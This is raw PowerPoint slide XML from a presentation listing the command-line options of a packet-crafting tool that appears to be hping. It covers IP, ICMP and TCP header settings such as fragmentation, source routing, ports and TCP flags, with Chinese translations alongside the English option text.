              <a:t>dontfrag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置不分段标志    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送不可恢复的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>碎片，这可以让你了解更多的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MTU PATH DISCOVERY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-g  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fragoff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    set the fragment offset    // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置断偏移。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-m  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mtu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置虚拟最大传输单元</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, implies --frag if packet size &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mtu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置虚拟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MTU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值，当大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mtu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的时候分段。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-o  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        type of service (default 0x00), try --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> help          // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字段，缺省</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，尽力而为？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-G  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>     includes RECORD_ROUTE option and display the route buffer    // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>记录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>路由，并显示路由缓冲。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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>lsrr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>松散源路由并记录路由        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>松散源路由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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssrr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>严格源路由并记录路由      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>严格源路由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-H  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ipproto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议字段，仅在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RAW IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模式下使用   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RAW IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模式里选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议。设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议域，仅在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RAW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模式使用。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91677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5D8B-351F-43F1-9435-5F75D69F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D198C-5F31-4F4F-B725-FD2BD182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-C  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmptype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型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echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)    // ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型，缺省回显请求。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-K  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmpcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代号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0)     // ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码。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--force-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>默认仅发送支持的类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)    // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>强制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp-gw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重定向网关地址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0.0.0.0)    // ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重定向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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp-ts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等同 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmptype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 13 (ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时间戳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)            // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时间戳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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp-addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等同 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmptype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 17 (ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址子网掩码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)  // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>子网地址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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-help  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>显示其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项帮助      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>// ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/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127491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7856A-753B-4036-8F7C-CA2E346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UDP/TCP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C0AE6-FE35-4EB4-9363-B53E7398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-s  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>baseport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>   base source port             (default random)              // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缺省随机源端口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-p  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>destport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>   [+][+]&lt;port&gt; destination port(default 0) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ctrl+z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/dec    // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缺省随机源端口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-k  --keep       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>keep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> still source port      // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>保持源端口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-w  --win        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>winsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> (default 64)        // win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的滑动窗口。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送字节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64)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  -O  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tcpoff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>     set fake </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> data offset     (instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tcphdrlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> / 4)    // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据偏移量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>取代</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址长度除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  -Q  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>seqnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>     shows only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> sequence number        // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>仅显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>序列号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-b  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>badcksum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>   (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送具有错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>校验和数据包。许多系统将修复发送数据包的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>校验和。所以你会得到错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP/TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>校验和。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-M  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>setseq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>序列号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-L  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>setack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置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ack   ------------------------------------- (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标志位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8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55571-DB4D-4A76-8285-E7DDAD68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UDP/TCP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1D61F-FD40-4D1F-823B-9A5BDB45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-F  --fin        set FIN flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  -S  --syn        set SYN flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  -R  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        set RST flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  -P  --push       set PUSH flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  -A  --ack        set ACK flag   ------------------------------------- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（设置 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标志 位）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-U  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>urg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        set URG flag      // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一大堆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>抱头的设置。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-X  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xmas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>       set X unused flag (0x40)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  -Y  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ymas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>       set Y unused flag (0x80)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tcpexitcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>last </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>th_flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>作为退出码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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tcp-mss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>启用具有给定值的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP MSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-timestamp  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>启用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
